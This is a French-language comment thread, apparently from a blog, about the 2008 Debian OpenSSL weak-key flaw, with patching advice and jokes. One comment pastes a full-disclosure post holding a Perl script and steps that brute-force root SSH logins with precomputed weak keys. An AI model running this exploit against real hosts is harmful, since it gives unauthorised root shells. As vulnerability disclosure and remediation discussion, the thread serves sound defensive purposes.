cette fois, un apt-get upgrade suffit, et vous met à jours libgnutls13 et openssl-blacklist

@bob (« Les systèmes libreS, de vraiS gruyèreS. »
Ça tombe bien pour Linux, le gruyère n’a pas de trou, c’est l’emmental qui en a :p

True story: I had to try several times to upload this comic because my ssh key was blacklisted.

L’occasion de resortir le bon vieux “Trust is a weakness” ?
(ceux qui ne connaissent pas devraient avoir honte ^^)

! Ceci dit, les clés générées avec GnuPG ou GNUTLS ne sont pas touchées :

http://lists.debian.org/debian-security-announce/2008/msg00152.html

http://wiki.debian.org/SSLkeys

Merci Obibi

Pouet !

mais c’est vrai que c’est pas terrible de se baser sur le pid pour générer la clé… je sais pas à quoi ils pensaient quand ils ont fait ça ^^

Edit: arghl ! 75Mo pour un POC… ils y vont pas de main morte

the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

On an unpatched system, which doesn’t need to be debian, do the following:

1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)

4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print « Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n »;
print « Example: ./exploiter.pl /root/keys/ 127.0.0.1\n »;
print « By mm@deadbeef.de\n »;
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die(« opendir »;
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system(« echo « .join( » « , @a). »; ssh -l root « .join( » « , map { « -i
« .$_ } @a). » « .$ARGV[1]);
@a = ();
}
}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm@deadbeef.de

_______________________________________________
Full-Disclosure – We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia – http://secunia.com/

Comprend pas, il ne met qu’unknow puis : 2048 xxxxxxxxxxxxxxx /chemin/vers/laclé.pub

On verra si j’arrive à me connecter aux serveurs…

mais je n’avais effectivement pas fait un dist-upgrade mais un upgrade, et j’avais pas remarqué que tu proposait un dist-upgrade… mea culpa

Edit: ça marche
merci Korben, t’es le meilleur ^^

PS: je viens de recevoir mes CD de Ubuntu 8.04

par contre, là où je suis emmerdé, c’est que mon seul accès vers le serveur est en ssh, donc je me retrouve avec ce beau message:

The following packages have been kept back:
openssh-client openssh-server ssl-cert
0 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.

une idée peut-être ?

sinon, la commande ssh-vulnkey n’existe pas chez moi… il faut un package supplémentaire ?

Conclusion : Dieu existe !

-> humour !

Heureusement, personne s’en sert, sinon ce serait un beau bordel.